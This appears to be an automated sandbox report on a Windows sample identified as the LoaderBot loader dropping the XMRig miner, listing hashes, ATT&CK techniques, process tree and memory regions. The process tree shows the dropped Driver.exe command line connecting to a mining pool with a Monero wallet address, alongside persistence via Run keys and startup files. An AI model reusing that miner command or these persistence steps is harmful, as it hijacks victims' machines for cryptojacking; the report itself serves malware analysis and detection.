Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240319-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240319-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-04-2024 01:51

General

  • Target

    646543a3d52cc28ce2defb91eb3a0fa2_JaffaCakes118.exe

  • Size

    4.3MB

  • MD5

    646543a3d52cc28ce2defb91eb3a0fa2

  • SHA1

    1932da4ace59883328d589cde74f11c01c713b0a

  • SHA256

    4d13c9ed600e109cf6540800f702eb28921b75c703a68e810bfea63d1989a81d

  • SHA512

    14027b89dfa307533917ac8e4f7deb9f2b6eac021ae9ecef33781739a45779c6573d49b740bc788875b41f8ddd9c6bb883d24f71392eadaa2a91e58bf2f572ac

  • SSDEEP

    98304:NNNaf55cH3Bj1JkxjOejrq8lVwOro1bbyOFb0hjB4+81TC:NNNa4HxDe/GDhFb0lB4+

Malware Config

Signatures

  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • LoaderBot executable 1 IoCs
  • XMRig Miner payload 14 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\646543a3d52cc28ce2defb91eb3a0fa2_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\646543a3d52cc28ce2defb91eb3a0fa2_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: RenamesItself
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3516
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.minexmr.com:4444 -u 4AKcSXh6Zck7cS2dWrau2yh8pzWD3EzsCQ1xaRbminrWPYJcZtQswfn1HF3j3b4XFdKcVrDh8R9dUUvVRk6JZwwsJEuxwLs -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1016
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5128 --field-trial-handle=2260,i,3739451884007376837,4900555371550671478,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:3712

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      Filesize

      4.3MB

      MD5

      c58b9de8d4554c6718264f55c9861cfd

      SHA1

      2e120be3d952d9deefc8972519d452bab8814156

      SHA256

      c371d06d30f5afea4fa0bf62f7ea104d3073c688802cdac21d33b4464e9beff4

      SHA512

      2d64f80a507b6bb6001b1c8eea09e5d7c7ede93ae3b670ec2db809b46ebead1758abe9b485ce4bb28440b8ad7164594fca08d28198f2c8cd807dbc9eb36d0335

    • memory/1016-25-0x0000000000400000-0x000000000108D000-memory.dmp
      Filesize

      12.6MB

    • memory/1016-27-0x0000000000400000-0x000000000108D000-memory.dmp
      Filesize

      12.6MB

    • memory/1016-22-0x0000000000400000-0x000000000108D000-memory.dmp
      Filesize

      12.6MB

    • memory/1016-21-0x0000000000400000-0x000000000108D000-memory.dmp
      Filesize

      12.6MB

    • memory/1016-15-0x0000000000400000-0x000000000108D000-memory.dmp
      Filesize

      12.6MB

    • memory/1016-16-0x0000000001390000-0x00000000013A4000-memory.dmp
      Filesize

      80KB

    • memory/1016-17-0x0000000000400000-0x000000000108D000-memory.dmp
      Filesize

      12.6MB

    • memory/1016-31-0x0000000000400000-0x000000000108D000-memory.dmp
      Filesize

      12.6MB

    • memory/1016-23-0x0000000000400000-0x000000000108D000-memory.dmp
      Filesize

      12.6MB

    • memory/1016-30-0x0000000000400000-0x000000000108D000-memory.dmp
      Filesize

      12.6MB

    • memory/1016-32-0x0000000000400000-0x000000000108D000-memory.dmp
      Filesize

      12.6MB

    • memory/1016-29-0x0000000000400000-0x000000000108D000-memory.dmp
      Filesize

      12.6MB

    • memory/1016-19-0x0000000000400000-0x000000000108D000-memory.dmp
      Filesize

      12.6MB

    • memory/1016-24-0x0000000000400000-0x000000000108D000-memory.dmp
      Filesize

      12.6MB

    • memory/1016-28-0x0000000000400000-0x000000000108D000-memory.dmp
      Filesize

      12.6MB

    • memory/1016-26-0x0000000000400000-0x000000000108D000-memory.dmp
      Filesize

      12.6MB

    • memory/3516-4-0x0000000005D80000-0x0000000005D90000-memory.dmp
      Filesize

      64KB

    • memory/3516-0-0x0000000074BC0000-0x0000000075370000-memory.dmp
      Filesize

      7.7MB

    • memory/3516-5-0x0000000006140000-0x00000000061A6000-memory.dmp
      Filesize

      408KB

    • memory/3516-20-0x0000000005D80000-0x0000000005D90000-memory.dmp
      Filesize

      64KB

    • memory/3516-18-0x0000000074BC0000-0x0000000075370000-memory.dmp
      Filesize

      7.7MB

    • memory/3516-1-0x0000000000E50000-0x00000000012B0000-memory.dmp
      Filesize

      4.4MB